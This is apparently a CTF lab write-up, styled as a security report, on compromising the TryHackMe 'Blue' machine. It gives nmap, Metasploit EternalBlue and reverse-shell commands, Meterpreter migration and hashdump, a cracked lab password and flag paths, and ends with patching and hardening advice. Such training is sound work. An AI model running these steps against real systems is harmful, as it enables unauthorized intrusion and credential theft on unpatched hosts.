# Technical Report

## <mark style="color:purple;">Technical Security Report: "Blue" System</mark>

### <mark style="color:purple;">Purpose of the Report</mark>

This document provides a structured technical assessment of the TryHackMe “Blue” machine. It outlines the phases of the engagement—from initial reconnaissance to post-exploitation activities—documents the tools and techniques used, and presents the findings. Finally, it offers actionable recommendations to remediate identified vulnerabilities and strengthen the system’s security posture.

***

### <mark style="color:purple;">Methodology</mark>

The security evaluation was conducted in the following phases:

1. **Reconnaissance**\
   Identification of open ports, services, and known vulnerabilities via automated scanning tools.
2. **Exploitation**\
   Leveraging the EternalBlue (MS17-010) exploit to gain initial access.
3. **Privilege Escalation**\
   Converting a basic shell to a Meterpreter session, process migration to a SYSTEM-owned process, and dumping password hashes.
4. **Post-Exploitation**\
   Cracking extracted hashes and locating high-value files (“flags”) on the target.

***

### <mark style="color:purple;">Detailed Findings</mark>

**1. Reconnaissance**

* **Tool:** `nmap`
* **Command:**

  ```bash
  sudo nmap -sC -sV -Pn -T5 -p1-9999 <target_ip>
  ```
* **Results:**
  * **Open Ports:** 445 (SMB) among three ports under 9999.
  * **Vulnerability Identified:** MS17-010 (EternalBlue) [Burattini Machines](https://patricio-burattini.gitbook.io/burattini-machines/tryhackme/quickstart-8/write-up)
* **Impact:**\
  The presence of SMBv1 with MS17-010 allows remote code execution, providing a critical entry point.

**2. Exploitation**

* **Tool:** Metasploit Framework
* **Commands:**

  ```bash
  msfconsole -q
  search ms17-010
  use exploit/windows/smb/ms17_010_eternalblue
  set RHOSTS <target_ip>
  set payload windows/x64/shell/reverse_tcp
  set LHOST <attacker_ip>
  run
  ```
* **Results:**\
  Successful exploitation yielding a reverse shell on the target.
* **Impact:**\
  Demonstrates the ease of exploiting unpatched SMBv1 services for remote shell access.

**3. Privilege Escalation**

* **Conversion to Meterpreter:**
  * **Commands:**

    ```bash
    Ctrl+Z; sessions -i <session_id>
    use post/multi/manage/shell_to_meterpreter
    set SESSION <session_id>
    run
    sessions -u <new_meterpreter_session>
    ```
  * **Result:** Meterpreter session established as SYSTEM.
* **Process Migration:**
  * **Commands:**

    ```bash
    meterpreter> ps
    meterpreter> migrate <PID_of_system_process>
    ```
  * **Result:** Migrated into a process running as NT AUTHORITY\SYSTEM.
* **Hash Dumping:**
  * **Command:** `meterpreter> hashdump`
  * **Findings:** Extracted NTLM hash for user **Jon**.
* **Impact:**\
  Full SYSTEM privileges allow lateral movement and credential harvesting, severely compromising the environment.

**4. Cracking**

* **Tool:** CrackStation (online)
* **Process:** Submitted Jon’s NTLM hash.
* **Result:** Plaintext password recovered: **alwfna22**
* **Impact:**\
  Weak password policy enables credential cracking, facilitating further unauthorized access.

**5. Flag Retrieval (Post-Exploitation)**

* **Flag1**
  * **Location:** `C:\flag1.txt`
  * **Commands:**

    ```bash
    bashCopyEditcd C:\
    type flag1.txt
    ```
* **Flag2**
  * **Location:** `C:\Windows\System32\config\flag2.txt`
  * **Commands:**

    ```bash
    bashCopyEditcd C:\Windows\System32\config\
    type flag2.txt
    ```
* **Flag3**
  * **Location:** `C:\Users\Jon\Documents\flag3.txt`
  * **Commands:**

    ```bash
    bashCopyEditcd C:\Users\Jon\Documents
    type flag3.txt
    ```
* **Impact:**\
  Demonstrates complete system compromise with access to sensitive files in protected directories

***

### <mark style="color:purple;">Recommendations</mark>

**Short-Term Actions**

* **Patch Management:** Immediately apply Microsoft’s MS17-010 patch or disable SMBv1 across all hosts.
* **Credential Hygiene:** Enforce strong password policies (minimum complexity and length) and rotate existing credentials.
* **Network Segmentation:** Restrict SMB traffic to only essential systems via firewall rules or VLAN segmentation.

**Long-Term Actions**

* **Continuous Vulnerability Scanning:** Implement automated scanning (e.g., Nessus, OpenVAS) to detect unpatched services.
* **Privileged Access Management:** Deploy Just-In-Time (JIT) access solutions and limit long-standing administrative accounts.
* **Monitoring and Alerting:** Tune IDS/IPS to detect anomalous SMB exploit attempts and meterpreter activity.
* **User Awareness:** Educate administrators on the risks of legacy protocols and importance of regular patch cycles.

***

### <mark style="color:purple;">Conclusion</mark>

The “Blue” machine was compromised through a well-known SMBv1 vulnerability (MS17-010). The engagement highlighted critical risks arising from unpatched services, weak credentials, and lack of network segmentation. Applying the outlined recommendations—patching, credential hardening, and enhanced monitoring—will substantially reduce the attack surface and improve overall security resilience.